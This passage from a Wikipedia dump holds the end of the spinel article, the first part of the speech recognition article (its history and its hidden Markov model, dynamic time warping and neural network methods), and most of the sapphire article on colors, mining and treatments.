Tajikistan; and of Mogok in Myanmar. Over the last decades gem quality spinels are found in the marbles of Lục Yên District (Vietnam), Mahenge and Matombo (Tanzania), Tsavo (Kenya) and in the gravels of Tunduru (Tanzania) and Ilakaka (Madagascar). Since 2000, in several locations around the world, spinels have been discovered with unusual vivid pink or blue colors. Such "glowing" spinels are known from Mogok (Myanmar), Mahenge plateau (Tanzania), Lục Yên District (Vietnam) and some more localities. In 2018 bright blue spinels have been reported also in the southern part of Baffin Island (Canada). The pure blue coloration of spinel is caused by small additions of cobalt. Synthetic spinel Synthetic spinel can be produced by similar means to synthetic corundum, including the Verneuil method and the flux method pioneered by Edmond Frémy. It is widely used as an inexpensive cut gem in birthstone jewelry for the month of August. Light blue synthetic spinel is a good imitation of aquamarine beryl, and green synthetic spinel is used as an emerald or tourmaline simulant. By 2015, transparent spinel was being made in sheets and other shapes through sintering. Synthetic spinel, which looks like glass but has notably higher strength against pressure, can also have applications in military and commercial use.
Physical sciences
Minerals
Earth science
29468
https://en.wikipedia.org/wiki/Speech%20recognition
Speech recognition
Speech recognition is an interdisciplinary subfield of computer science and computational linguistics that develops methodologies and technologies that enable the recognition and translation of spoken language into text by computers. It is also known as automatic speech recognition (ASR), computer speech recognition or speech-to-text (STT). It incorporates knowledge and research in the computer science, linguistics and computer engineering fields. The reverse process is speech synthesis. Some speech recognition systems require "training" (also called "enrollment") where an individual speaker reads text or isolated vocabulary into the system. The system analyzes the person's specific voice and uses it to fine-tune the recognition of that person's speech, resulting in increased accuracy. Systems that do not use training are called "speaker-independent" systems. Systems that use training are called "speaker dependent". Speech recognition applications include voice user interfaces such as voice dialing (e.g. "call home"), call routing (e.g. "I would like to make a collect call"), domotic appliance control, search key words (e.g. find a podcast where particular words were spoken), simple data entry (e.g., entering a credit card number), preparation of structured documents (e.g. a radiology report), determining speaker characteristics, speech-to-text processing (e.g., word processors or emails), and aircraft (usually termed direct voice input). Automatic pronunciation assessment is used in education such as for spoken language learning. The term voice recognition or speaker identification refers to identifying the speaker, rather than what they are saying. Recognizing the speaker can simplify the task of translating speech in systems that have been trained on a specific person's voice or it can be used to authenticate or verify the identity of a speaker as part of a security process. From the technology perspective, speech recognition has a long history with several waves of major innovations. Most recently, the field has benefited from advances in deep learning and big data. The advances are evidenced not only by the surge of academic papers published in the field, but more importantly by the worldwide industry adoption of a variety of deep learning methods in designing and deploying speech recognition systems. History The key areas of growth were: vocabulary size, speaker independence, and processing speed. Pre-1970 1952 – Three Bell Labs researchers, Stephen Balashek, R. Biddulph, and K. H. Davis built a system called "Audrey" for single-speaker digit recognition. Their system located the formants in the power spectrum of each utterance. 1960 – Gunnar Fant developed and published the source-filter model of speech production. 1962 – IBM demonstrated its 16-word "Shoebox" machine's speech recognition capability at the 1962 World's Fair. 1966 – Linear predictive coding (LPC), a speech coding method, was first proposed by Fumitada Itakura of Nagoya University and Shuzo Saito of Nippon Telegraph and Telephone (NTT), while working on speech recognition. 1969 – Funding at Bell Labs dried up for several years when, in 1969, the influential John Pierce wrote an open letter that was critical of and defunded speech recognition research. This defunding lasted until Pierce retired and James L. Flanagan took over. Raj Reddy was the first person to take on continuous speech recognition as a graduate student at Stanford University in the late 1960s. Previous systems required users to pause after each word. Reddy's system issued spoken commands for playing chess. Around this time Soviet researchers invented the dynamic time warping (DTW) algorithm and used it to create a recognizer capable of operating on a 200-word vocabulary. DTW processed speech by dividing it into short frames, e.g. 10ms segments, and processing each frame as a single unit. Although DTW would be superseded by later algorithms, the technique carried on. Achieving speaker independence remained unsolved at this time period. 1970–1990 1971 – DARPA funded five years for Speech Understanding Research, speech recognition research seeking a minimum vocabulary size of 1,000 words. They thought speech understanding would be key to making progress in speech recognition, but this later proved untrue. BBN, IBM, Carnegie Mellon and Stanford Research Institute all participated in the program. This revived speech recognition research post John Pierce's letter. 1972 – The IEEE Acoustics, Speech, and Signal Processing group held a conference in Newton, Massachusetts. 1976 – The first ICASSP was held in Philadelphia, which since then has been a major venue for the publication of research on speech recognition. During the late 1960s Leonard Baum developed the mathematics of Markov chains at the Institute for Defense Analysis. A decade later, at CMU, Raj Reddy's students James Baker and Janet M. Baker began using the hidden Markov model (HMM) for speech recognition. James Baker had learned about HMMs from a summer job at the Institute of Defense Analysis during his undergraduate education. The use of HMMs allowed researchers to combine different sources of knowledge, such as acoustics, language, and syntax, in a unified probabilistic model. By the mid-1980s IBM's Fred Jelinek's team created a voice activated typewriter called Tangora, which could handle a 20,000-word vocabulary Jelinek's statistical approach put less emphasis on emulating the way the human brain processes and understands speech in favor of using statistical modeling techniques like HMMs. (Jelinek's group independently discovered the application of HMMs to speech.) This was controversial with linguists since HMMs are too simplistic to account for many common features of human languages. However, the HMM proved to be a highly useful way for modeling speech and replaced dynamic time warping to become the dominant speech recognition algorithm in the 1980s. 1982 – Dragon Systems, founded by James and Janet M. Baker, was one of IBM's few competitors. Practical speech recognition The 1980s also saw the introduction of the n-gram language model. 1987 – The back-off model allowed language models to use multiple length n-grams, and CSELT used HMM to recognize languages (both in software and in hardware specialized processors, e.g. RIPAC). Much of the progress in the field is owed to the rapidly increasing capabilities of computers. At the end of the DARPA program in 1976, the best computer available to researchers was the PDP-10 with 4 MB ram. It could take up to 100 minutes to decode just 30 seconds of speech. Two practical products were: 1984 – was released the Apricot Portable with up to 4096 words support, of which only 64 could be held in RAM at a time. 1987 – a recognizer from Kurzweil Applied Intelligence 1990 – Dragon Dictate, a consumer product released in 1990 AT&T deployed the Voice Recognition Call Processing service in 1992 to route telephone calls without the use of a human operator. The technology was developed by Lawrence Rabiner and others at Bell Labs. By this point, the vocabulary of the typical commercial speech recognition system was larger than the average human vocabulary. Raj Reddy's former student, Xuedong Huang, developed the Sphinx-II system at CMU. The Sphinx-II system was the first to do speaker-independent, large vocabulary, continuous speech recognition and it had the best performance in DARPA's 1992 evaluation. Handling continuous speech with a large vocabulary was a major milestone in the history of speech recognition. Huang went on to found the speech recognition group at Microsoft in 1993. Raj Reddy's student Kai-Fu Lee joined Apple where, in 1992, he helped develop a speech interface prototype for the Apple computer known as Casper. Lernout & Hauspie, a Belgium-based speech recognition company, acquired several other companies, including Kurzweil Applied Intelligence in 1997 and Dragon Systems in 2000. The L&H speech technology was used in the Windows XP operating system. L&H was an industry leader until an accounting scandal brought an end to the company in 2001. The speech technology from L&H was bought by ScanSoft which became Nuance in 2005. Apple originally licensed software from Nuance to provide speech recognition capability to its digital assistant Siri. 2000s In the 2000s DARPA sponsored two speech recognition programs: Effective Affordable Reusable Speech-to-Text (EARS) in 2002 and Global Autonomous Language Exploitation (GALE). Four teams participated in the EARS program: IBM, a team led by BBN with LIMSI and Univ. of Pittsburgh, Cambridge University, and a team composed of ICSI, SRI and University of Washington. EARS funded the collection of the Switchboard telephone speech corpus containing 260 hours of recorded conversations from over 500 speakers. The GALE program focused on Arabic and Mandarin broadcast news speech. Google's first effort at speech recognition came in 2007 after hiring some researchers from Nuance. The first product was GOOG-411, a telephone based directory service. The recordings from GOOG-411 produced valuable data that helped Google improve their recognition systems. Google Voice Search is now supported in over 30 languages. In the United States, the National Security Agency has made use of a type of speech recognition for keyword spotting since at least 2006. This technology allows analysts to search through large volumes of recorded conversations and isolate mentions of keywords. Recordings can be indexed and analysts can run queries over the database to find conversations of interest. Some government research programs focused on intelligence applications of speech recognition, e.g. DARPA's EARS's program and IARPA's Babel program. In the early 2000s, speech recognition was still dominated by traditional approaches such as hidden Markov models combined with feedforward artificial neural networks. Today, however, many aspects of speech recognition have been taken over by a deep learning method called Long short-term memory (LSTM), a recurrent neural network published by Sepp Hochreiter & Jürgen Schmidhuber in 1997. LSTM RNNs avoid the vanishing gradient problem and can learn "Very Deep Learning" tasks that require memories of events that happened thousands of discrete time steps ago, which is important for speech. Around 2007, LSTM trained by Connectionist Temporal Classification (CTC) started to outperform traditional speech recognition in certain applications. In 2015, Google's speech recognition reportedly experienced a dramatic performance jump of 49% through CTC-trained LSTM, which is now available through Google Voice to all smartphone users. Transformers, a type of neural network based solely on "attention", have been widely adopted in computer vision and language modeling, sparking the interest of adapting such models to new domains, including speech recognition. Some recent papers reported superior performance levels using transformer models for speech recognition, but these models usually require large scale training datasets to reach high performance levels. The use of deep feedforward (non-recurrent) networks for acoustic modeling was introduced during the later part of 2009 by Geoffrey Hinton and his students at the University of Toronto and by Li Deng and colleagues at Microsoft Research, initially in the collaborative work between Microsoft and the University of Toronto which was subsequently expanded to include IBM and Google (hence "The shared views of four research groups" subtitle in their 2012 review paper). A Microsoft research executive called this innovation "the most dramatic change in accuracy since 1979". In contrast to the steady incremental improvements of the past few decades, the application of deep learning decreased word error rate by 30%. This innovation was quickly adopted across the field. Researchers have begun to use deep learning techniques for language modeling as well. In the long history of speech recognition, both shallow form and deep form (e.g. recurrent nets) of artificial neural networks had been explored for many years during 1980s, 1990s and a few years into the 2000s. But these methods never won over the non-uniform internal-handcrafting Gaussian mixture model/hidden Markov model (GMM-HMM) technology based on generative models of speech trained discriminatively. A number of key difficulties had been methodologically analyzed in the 1990s, including gradient diminishing and weak temporal correlation structure in the neural predictive models. All these difficulties were in addition to the lack of big training data and big computing power in these early days. Most speech recognition researchers who understood such barriers hence subsequently moved away from neural nets to pursue generative modeling approaches until the recent resurgence of deep learning starting around 2009–2010 that had overcome all these difficulties. Hinton et al. and Deng et al. reviewed part of this recent history about how their collaboration with each other and then with colleagues across four groups (University of Toronto, Microsoft, Google, and IBM) ignited a renaissance of applications of deep feedforward neural networks for speech recognition. 2010s By early 2010s speech recognition, also called voice recognition was clearly differentiated from speaker recognition, and speaker independence was considered a major breakthrough. Until then, systems required a "training" period. A 1987 ad for a doll had carried the tagline "Finally, the doll that understands you." – despite the fact that it was described as "which children could train to respond to their voice". In 2017, Microsoft researchers reached a historical human parity milestone of transcribing conversational telephony speech on the widely benchmarked Switchboard task. Multiple deep learning models were used to optimize speech recognition accuracy. The speech recognition word error rate was reported to be as low as 4 professional human transcribers working together on the same benchmark, which was funded by IBM Watson speech team on the same task. Models, methods, and algorithms Both acoustic modeling and language modeling are important parts of modern statistically based speech recognition algorithms. Hidden Markov models (HMMs) are widely used in many systems. Language modeling is also used in many other natural language processing applications such as document classification or statistical machine translation. Hidden Markov models Modern general-purpose speech recognition systems are based on hidden Markov models. These are statistical models that output a sequence of symbols or quantities. HMMs are used in speech recognition because a speech signal can be viewed as a piecewise stationary signal or a short-time stationary signal. In a short time scale (e.g., 10 milliseconds), speech can be approximated as a stationary process. Speech can be thought of as a Markov model for many stochastic purposes. Another reason why HMMs are popular is that they can be trained automatically and are simple and computationally feasible to use. In speech recognition, the hidden Markov model would output a sequence of n-dimensional real-valued vectors (with n being a small integer, such as 10), outputting one of these every 10 milliseconds. The vectors would consist of cepstral coefficients, which are obtained by taking a Fourier transform of a short time window of speech and decorrelating the spectrum using a cosine transform, then taking the first (most significant) coefficients. The hidden Markov model will tend to have in each state a statistical distribution that is a mixture of diagonal covariance Gaussians, which will give a likelihood for each observed vector. Each word, or (for more general speech recognition systems), each phoneme, will have a different output distribution; a hidden Markov model for a sequence of words or phonemes is made by concatenating the individual trained hidden Markov models for the separate words and phonemes. Described above are the core elements of the most common, HMM-based approach to speech recognition. Modern speech recognition systems use various combinations of a number of standard techniques in order to improve results over the basic approach described above. A typical large-vocabulary system would need context dependency for the phonemes (so that phonemes with different left and right context would have different realizations as HMM states); it would use cepstral normalization to normalize for a different speaker and recording conditions; for further speaker normalization, it might use vocal tract length normalization (VTLN) for male-female normalization and maximum likelihood linear regression (MLLR) for more general speaker adaptation. The features would have so-called delta and delta-delta coefficients to capture speech dynamics and in addition, might use heteroscedastic linear discriminant analysis (HLDA); or might skip the delta and delta-delta coefficients and use splicing and an LDA-based projection followed perhaps by heteroscedastic linear discriminant analysis or a global semi-tied co variance transform (also known as maximum likelihood linear transform, or MLLT). Many systems use so-called discriminative training techniques that dispense with a purely statistical approach to HMM parameter estimation and instead optimize some classification-related measure of the training data. Examples are maximum mutual information (MMI), minimum classification error (MCE), and minimum phone error (MPE). Decoding of the speech (the term for what happens when the system is presented with a new utterance and must compute the most likely source sentence) would probably use the Viterbi algorithm to find the best path, and here there is a choice between dynamically creating a combination hidden Markov model, which includes both the acoustic and language model information and combining it statically beforehand (the finite state transducer, or FST, approach). A possible improvement to decoding is to keep a set of good candidates instead of just keeping the best candidate, and to use a better scoring function (re scoring) to rate these good candidates so that we may pick the best one according to this refined score. The set of candidates can be kept either as a list (the N-best list approach) or as a subset of the models (a lattice). Re scoring is usually done by trying to minimize the Bayes risk (or an approximation thereof) Instead of taking the source sentence with maximal probability, we try to take the sentence that minimizes the expectancy of a given loss function with regards to all possible transcriptions (i.e., we take the sentence that minimizes the average distance to other possible sentences weighted by their estimated probability). The loss function is usually the Levenshtein distance, though it can be different distances for specific tasks; the set of possible transcriptions is, of course, pruned to maintain tractability. Efficient algorithms have been devised to re score lattices represented as weighted finite state transducers with edit distances represented themselves as a finite state transducer verifying certain assumptions. Dynamic time warping (DTW)-based speech recognition Dynamic time warping is an approach that was historically used for speech recognition but has now largely been displaced by the more successful HMM-based approach. Dynamic time warping is an algorithm for measuring similarity between two sequences that may vary in time or speed. For instance, similarities in walking patterns would be detected, even if in one video the person was walking slowly and if in another he or she were walking more quickly, or even if there were accelerations and deceleration during the course of one observation. DTW has been applied to video, audio, and graphics – indeed, any data that can be turned into a linear representation can be analyzed with DTW. A well-known application has been automatic speech recognition, to cope with different speaking speeds. In general, it is a method that allows a computer to find an optimal match between two given sequences (e.g., time series) with certain restrictions. That is, the sequences are "warped" non-linearly to match each other. This sequence alignment method is often used in the context of hidden Markov models. Neural networks Neural networks emerged as an attractive acoustic modeling approach in ASR in the late 1980s. Since then, neural networks have been used in many aspects of speech recognition such as phoneme classification, phoneme classification through multi-objective evolutionary algorithms, isolated word recognition, audiovisual speech recognition, audiovisual speaker recognition and speaker adaptation. Neural networks make fewer explicit assumptions about feature statistical properties than HMMs and have several qualities making them more attractive recognition models for speech recognition. When used to estimate the probabilities of a speech feature segment, neural networks allow discriminative training in a natural and efficient manner. However, in spite of their effectiveness in classifying short-time units such as individual phonemes and isolated words, early neural networks were rarely successful for continuous recognition tasks because of their limited ability to model temporal dependencies. One approach to this limitation was to use neural networks as a pre-processing, feature transformation or dimensionality reduction, step prior to HMM based recognition. However, more recently, LSTM and related recurrent neural networks (RNNs), Time Delay Neural Networks(TDNN's), and transformers have demonstrated improved performance in this area. Deep feedforward and recurrent neural networks Deep neural networks and denoising autoencoders are also under investigation. A deep feedforward neural network (DNN) is an artificial neural network with multiple hidden layers of units between the input and output layers. Similar to shallow neural networks, DNNs can model complex non-linear relationships. DNN architectures generate compositional models, where extra layers enable composition of features from lower layers, giving a huge learning capacity and thus the potential of modeling complex patterns of speech data. A success of DNNs in large vocabulary speech recognition occurred in 2010 by industrial researchers, in collaboration with academic researchers, where large output layers of the DNN based on context dependent HMM states constructed by decision trees were adopted. See comprehensive reviews of this development and of the state of the art as of October 2014 in the recent Springer book from Microsoft Research.
Technology
Artificial intelligence concepts
null
29469
https://en.wikipedia.org/wiki/Sapphire
Sapphire
Sapphire is a precious gemstone, a variety of the mineral corundum, consisting of aluminium oxide () with trace amounts of elements such as iron, titanium, cobalt, lead, chromium, vanadium, magnesium, boron, and silicon. The name sapphire is derived from the Latin word , itself from the Greek word (), which referred to lapis lazuli. It is typically blue, but natural "fancy" sapphires also occur in yellow, purple, orange, and green colors; "parti sapphires" show two or more colors. Red corundum stones also occur, but are called rubies rather than sapphires. Pink-colored corundum may be classified either as ruby or sapphire depending on the locale. Commonly, natural sapphires are cut and polished into gemstones and worn in jewelry. They also may be created synthetically in laboratories for industrial or decorative purposes in large crystal boules. Because of the remarkable hardness of sapphires 9 on the Mohs scale (the third-hardest mineral, after diamond at 10 and moissanite at 9.5) sapphires are also used in some non-ornamental applications, such as infrared optical components, high-durability windows, wristwatch crystals and movement bearings, and very thin electronic wafers, which are used as the insulating substrates of special-purpose solid-state electronics such as integrated circuits and GaN-based blue LEDs. Sapphire is the birthstone for September and the gem of the 45th anniversary. A sapphire jubilee occurs after 65 years. Natural sapphires Sapphire is one of the two gem-varieties of corundum, the other being ruby (defined as corundum in a shade of red). Although blue is the best-known sapphire color, it occurs in other colors, including gray and black, and also can be colorless. A pinkish orange variety of sapphire is called padparadscha. Significant sapphire deposits are found in Australia, Afghanistan, Cambodia, Cameroon, China (Shandong), Colombia, Ethiopia, India Jammu and Kashmir (Padder, Kishtwar), Kenya, Laos, Madagascar, Malawi, Mozambique, Myanmar (Burma), Nigeria, Rwanda, Sri Lanka, Tanzania, Thailand, United States (Montana) and Vietnam. Sapphire and rubies are often found in the same geographical settings, but they generally have different geological formations. For example, both ruby and sapphire are found in Myanmar's Mogok Stone Tract, but the rubies form in marble, while the sapphire forms in granitic pegmatites or corundum syenites. Every sapphire mine produces a wide range of quality, and origin is not a guarantee of quality. For sapphire, Jammu and Kashmir receives the highest premium, although Burma, Sri Lanka, and Madagascar also produce large quantities of fine quality gems. The cost of natural sapphires varies depending on their color, clarity, size, cut, and overall quality. Sapphires that are completely untreated are worth far more than those that have been treated. Geographical origin also has a major impact on price. For most gems of one carat or more, an independent report from a respected laboratory such as GIA, Lotus Gemology, or SSEF, is often required by buyers before they will make a purchase. Colors Sapphires in colors other than blue are called "fancy" sapphires. "Parti sapphire" is used for multicolor stones with zoning of different colors (hues), but not different shades. Fancy sapphires are found in yellow, orange, green, brown, purple, violet, and practically any other hue. Blue sapphire Gemstone color can be described in terms of hue, saturation, and tone. Hue is commonly understood as the "color" of the gemstone. Saturation refers to the vividness or brightness of the hue, and tone is the lightness to darkness of the hue. Blue sapphire exists in various mixtures of its primary (blue) and secondary hues, various tonal levels (shades) and at various levels of saturation (vividness). Blue sapphires are evaluated based upon the purity of their blue hue. Violet and green are the most common secondary hues found in blue sapphires. The highest prices are paid for gems that are pure blue and of vivid saturation. Gems that are of lower saturation, or are too dark or too light in tone are of less value. However, color preferences are a personal taste. The Logan sapphire in the National Museum of Natural History, in Washington, D.C., is one of the largest faceted gem-quality blue sapphires in existence. Parti sapphires Particolored sapphires (or bi-color sapphires) are those stones that exhibit two or more colors within a single stone. The desirability of particolored or bi-color sapphires is usually judged based on the zoning or location of their colors, the colors' saturation, and the contrast of their colors. Australia is the largest source of particolored sapphires; they are not commonly used in mainstream jewelry and remain relatively unknown. Particolored sapphires cannot be created synthetically and only occur naturally. Pink sapphires Pink sapphires occur in shades from light to dark pink, and deepen in color as the quantity of chromium increases. The deeper the pink color, the higher their monetary value. In the United States, a minimum color saturation must be met to be called a ruby, otherwise the stone is referred to as a pink sapphire. Padparadscha Padparadscha is a delicate, light to medium toned, pink-orange to orange-pink hued corundum, originally found in Sri Lanka, but also found in deposits in Vietnam and parts of East Africa. Padparadscha sapphires are rare; the rarest of all is the totally natural variety, with no sign of artificial treatment. The name is derived from the Sanskrit padma ranga (padma = lotus; ranga = color), a color akin to the lotus flower (Nelumbo nucifera). Among the fancy (non-blue) sapphires, natural padparadscha fetch the highest prices. Since 2001, more sapphires of this color have appeared on the market as a result of artificial lattice diffusion of beryllium. Star sapphire A star sapphire is a type of sapphire that exhibits a star-like phenomenon known as asterism; red stones are known as "star rubies". Star sapphires contain intersecting needle-like inclusions following the underlying crystal structure that causes the appearance of a six-rayed "star"-shaped pattern when viewed with a single overhead light source. The inclusion is often the mineral rutile, a mineral composed primarily of titanium dioxide. The stones are cut en cabochon, typically with the center of the star near the top of the dome. Occasionally, twelve-rayed stars are found, typically because two different sets of inclusions are found within the same stone, such as a combination of fine needles of rutile with small platelets of hematite; the first results in a whitish star and the second results in a golden-colored star. During crystallization, the two types of inclusions become preferentially oriented in different directions within the crystal, thereby forming two six-rayed stars that are superimposed upon each other to form a twelve-rayed star. Misshapen stars or 12-rayed stars may also form as a result of twinning. The inclusions can alternatively produce a cat's eye effect if the girdle plane of the cabochon is oriented parallel to the crystal's c-axis rather than perpendicular to it. To get a cat's eye, the planes of exsolved inclusions must be extremely uniform and tightly packed. If the dome is oriented in between these two directions, an off-center star will be visible, offset away from the high point of the dome. At 1404.49 carats, The Star of Adam is the largest known blue star sapphire. The gem was mined in the city of Ratnapura, southern Sri Lanka. The Black Star of Queensland, the second largest star sapphire in the world, weighs 733 carats. The Star of India mined in Sri Lanka and weighing 563.4 carats is thought to be the third-largest star sapphire, and is currently on display at the American Museum of Natural History in New York City. The 182-carat Star of Bombay, mined in Sri Lanka and located in the National Museum of Natural History in Washington, D.C., is another example of a large blue star sapphire. The value of a star sapphire depends not only on the weight of the stone, but also the body color, visibility, and intensity of the asterism. The color of the stone has more impact on the value than the visibility of the star. Since more transparent stones tend to have better colors, the most expensive star stones are semi-transparent "glass body" stones with vivid colors. On 28 July 2021, the world's largest cluster of star sapphires, weighing , was unearthed from Ratnapura, Sri Lanka. This star sapphire cluster was named "Serendipity Sapphire". Color-change sapphire A rare variety of natural sapphire, known as color-change sapphire, exhibits different colors in different light. Color change sapphires are blue in outdoor light and purple under incandescent indoor light, or green to gray-green in daylight and pink to reddish-violet in incandescent light. Color-change sapphires come from a variety of locations, including Madagascar, Myanmar, Sri Lanka and Tanzania. Two types exist. The first features the chromium chromophore that creates the red color of ruby, combined with the iron + titanium chromophore that produces the blue color in sapphire. A rarer type, which comes from the Mogok area of Myanmar, features a vanadium chromophore, the same as is present in Verneuil synthetic color-change sapphire. Virtually all gemstones that show the "alexandrite effect" (color change or 'metamerism') show similar absorption/transmission features in the visible spectrum. This is an absorption band in the yellow (~590 nm), along with valleys of transmission in the blue-green and red. Thus the color one sees depends on the spectral composition of the light source. Daylight is relatively balanced in its spectral power distribution (SPD) and since the human eye is most sensitive to green light, the balance is tipped to the green side. However incandescent light (including candle light) is heavily tilted to the red end of the spectrum, thus tipping the balance to red. Color-change sapphires colored by the Cr + Fe/Ti chromophores generally change from blue or violet-blue to violet or purple. Those colored by the V chromophore can show a more pronounced change, moving from blue-green to purple. Certain synthetic color-change sapphires have a similar color change to the natural gemstone alexandrite and they are sometimes marketed as "alexandrium" or "synthetic alexandrite". However, the latter term is a misnomer: synthetic color-change sapphires are, technically, not synthetic alexandrites but rather alexandrite simulants. This is because genuine alexandrite is a variety of chrysoberyl: not sapphire, but an entirely different mineral from corundum. Large rubies and sapphires Large rubies and sapphires of poor transparency are frequently used with suspect appraisals that vastly overstate their value. This was the case of the "Life and Pride of America Star Sapphire". Circa 1985, Roy Whetstine claimed to have bought the 1905-ct stone for $10 at the Tucson gem show, but a reporter discovered that L.A. Ward of Fallbrook, California, who appraised it at the price of $1200/ct, had appraised another stone of the exact same weight several years before Whetstine claimed to have found it. Bangkok-based Lotus Gemology maintains an updated listing of world auction records of ruby, sapphire, and spinel. As of November 2019, no sapphire has ever sold at auction for more than $17,295,796. Cause of color Rubies are corundum with a dominant red body color. This is generally caused by traces of chromium (Cr3+) substituting for the (Al3+) ion in the corundum structure. The color can be modified by both iron and trapped hole color centers. Unlike localized ("intra-atomic") absorption of light, which causes color for chromium and vanadium impurities, blue color in sapphires comes from intervalence charge transfer, which is the transfer of an electron from one transition-metal ion to another via the conduction or valence band. The iron can take the form Fe2+ or Fe3+, while titanium generally takes the form Ti4+. If Fe2+ and Ti4+ ions are substituted for Al3+, localized areas of charge imbalance are created. An electron transfer from Fe2+ and Ti4+ can cause a change in the valence state of both. Because of the valence change, there is a specific change in energy for the electron, and electromagnetic energy is absorbed. The wavelength of the energy absorbed corresponds to yellow light. When this light is subtracted from incident white light, the complementary color blue results. Sometimes when atomic spacing is different in different directions, there is resulting blue-green dichroism. Purple sapphires contain trace amounts of chromium and iron plus titanium and come in a variety of shades. Corundum that contains extremely low levels of chromophores is near colorless. Completely colorless corundum generally does not exist in nature. If trace amounts of iron are present, a very pale yellow to green color may be seen. However, if both titanium and iron impurities are present together, and in the correct valence states, the result is a blue color. Intervalence charge transfer is a process that produces a strong colored appearance at a low percentage of impurity. While at least 1% chromium must be present in corundum before the deep red ruby color is seen, sapphire blue is apparent with the presence of only 0.01% of titanium and iron. Colorless sapphires, which are uncommon in nature, were once used as diamond substitutes in jewelry, and are presently used as accent stones. The most complete description of the causes of color in corundum extant can be found in Chapter 4 of Ruby & Sapphire: A Gemologist's Guide (chapter authored by John Emmett, Emily Dubinsky and Richard Hughes). Mining Sapphires are mined from alluvial deposits or from primary underground workings. Commercial mining locations for sapphire and ruby include (but are not limited to) the following countries: Afghanistan, Australia, Myanmar/Burma, Cambodia, China, Colombia, India, Kenya, Laos, Madagascar, Malawi, Nepal, Nigeria, Pakistan, Sri Lanka, Tajikistan, Tanzania, Thailand, United States, and Vietnam. Sapphires from different geographic locations may have different appearances or chemical-impurity concentrations, and tend to contain different types of microscopic inclusions. Because of this, sapphires can be divided into three broad categories: classic metamorphic, non-classic metamorphic or magmatic, and classic magmatic. Sapphires from certain locations, or of certain categories, may be more commercially appealing than others, particularly classic metamorphic sapphires from Kashmir, Burma, or Sri Lanka that have not been subjected to heat-treatment. The Logan sapphire, the Star of India, The Star of Adam and the Star of Bombay originate from Sri Lankan mines. Madagascar is the world leader in sapphire production (as of 2007) specifically its deposits in and around the town of Ilakaka. Prior to the opening of the Ilakaka mines, Australia was the largest producer of sapphires (such as in 1987). In 1991 a new source of sapphires was discovered in Andranondambo, southern Madagascar. The exploitation started in 1993, but was practically abandoned just a few years later because of the difficulties in recovering sapphires in their bedrock. In North America, sapphires have been mined mostly from deposits in Montana: facies along the Missouri River near Helena, Montana, Dry Cottonwood Creek near Deer Lodge, Montana, and Rock Creek near Philipsburg, Montana. Fine blue Yogo sapphires are found at Yogo Gulch west of Lewistown, Montana. A few gem-grade sapphires and rubies have also been found in the area of Franklin, North Carolina. The sapphire deposits of Kashmir are well known in the gem industry, although their peak production took place in a relatively short period at the end of the nineteenth and early twentieth centuries. These deposits are located in the Paddar Valley of the Jammu region of Jammu and Kashmir in India. They have a superior vivid blue hue, coupled with a mysterious and almost sleepy quality, described by some gem enthusiasts as ‘blue velvet”. Kashmir-origin contributes meaningfully to the value of a sapphire, and most corundum of Kashmir origin can be readily identified by its characteristic silky appearance and exceptional hue. The unique blue appears lustrous under any kind of light, unlike non-Kashmir sapphires which may appear purplish or grayish in comparison. Sotheby's has been in the forefront overseeing record-breaking sales of Kashmir sapphires worldwide. In October 2014, Sotheby's Hong Kong achieved consecutive per-carat price records for Kashmir sapphires – first with the 12.00 carat Cartier sapphire ring at US$193,975 per carat, then with a 17.16 carat sapphire at US$236,404, and again in June 2015 when the per-carat auction record was set at US$240,205. At present, the world record price-per-carat for sapphire at auction is held by a sapphire from Kashmir in a ring, which sold in October 2015 for approximately US$242,000 per carat (HK$52,280,000 in total, including buyer's premium, or more than US$6.74 million). Treatments Sapphires can be treated by several methods to enhance and improve their clarity and color. It is common practice to heat natural sapphires to improve or enhance their appearance. This is done by heating the sapphires in furnaces to temperatures between for several hours, or even weeks at a time. Different atmospheres may be used. Upon heating, the stone becomes bluer in color, but loses some of the rutile inclusions (silk). When high temperatures (1400 °C+) are used, exsolved rutile silk is dissolved and it becomes clear under magnification. The titanium from the rutile enters solid solution and thus creates with iron the blue color. The inclusions in natural stones are easily seen with a jeweler's loupe. Evidence of sapphire and other gemstones being subjected to heating goes back at least to Roman times. Un-heated natural stones are somewhat rare and will often be sold accompanied by a certificate from an independent gemological laboratory attesting to "no evidence of heat treatment". Yogo sapphires do not need heat treating because their cornflower blue color is attractive out of the ground; they are generally free of inclusions, and have high uniform clarity. When Intergem Limited began marketing the Yogo in the 1980s as the world's only guaranteed untreated sapphire, heat treatment was not commonly disclosed; by the late 1980s, heat treatment became a major issue. At that time, much of all the world's sapphires were being heated to enhance their natural color. Intergem's marketing of guaranteed untreated Yogos set them against many in the gem industry. This issue appeared as a front-page story in The Wall Street Journal on 29 August 1984 in an article by Bill Richards, Carats and Schticks: Sapphire Marketer Upsets The Gem Industry. However, the biggest problem the Yogo mine faced was not competition from heated sapphires, but the fact that the Yogo stones could never produce quantities of sapphire above one carat after faceting. As a result, it has remained a niche product, with a market that largely exists in the US. Lattice ('bulk') diffusion treatments are used to add impurities to the sapphire to enhance color. This process was originally developed and patented by Linde Air division of Union Carbide and involved diffusing titanium into synthetic sapphire to even out the blue color. It was later applied to natural sapphire. Today, titanium diffusion often uses a synthetic colorless sapphire base. The color layer created by titanium diffusion is extremely thin (less than 0.5 mm). Thus repolishing can and does produce slight to significant loss of color. Chromium diffusion has been attempted, but was abandoned due to the slow diffusion rates of chromium in corundum. In the year 2000, beryllium diffused "padparadscha" colored sapphires entered the market. Typically beryllium is diffused into a sapphire under very high heat, just below the melting point of the sapphire. Initially () orange sapphires were created, although now the process has been advanced and many colors of sapphire are often treated with beryllium. Due to the small size of the beryllium ion, the color penetration is far greater than with titanium diffusion. In some cases, it may penetrate the entire stone. Beryllium-diffused orange sapphires may be difficult to detect, requiring advanced chemical analysis by gemological labs (e.g., Gübelin, SSEF, GIA, American Gemological Laboratories (AGL), Lotus Gemology. According to United States Federal Trade Commission guidelines, disclosure is required of any mode of enhancement that has a significant effect on the gem's value. There are several ways of treating sapphire. Heat-treatment in a reducing or oxidizing atmosphere (but without the use of any other added impurities) is commonly used to improve the color of sapphires, and this process is sometimes known as "heating only" in the gem trade. In contrast, however, heat treatment combined with the deliberate addition of certain specific impurities (e.g. beryllium, titanium, iron, chromium or nickel, which are absorbed into the crystal structure of the sapphire) is also commonly performed, and this process can be known as "diffusion" in the gem trade. However, despite what the terms "heating only" and "diffusion" might suggest, both of these categories of treatment actually involve diffusion processes. The most complete description of corundum treatments extant can be found in Chapter 6 of Ruby & Sapphire: A Gemologist's Guide (chapter authored by John Emmett, Richard Hughes and Troy R. Douthit). Synthetic sapphire In 1902, the French chemist Auguste Verneuil announced a process for producing 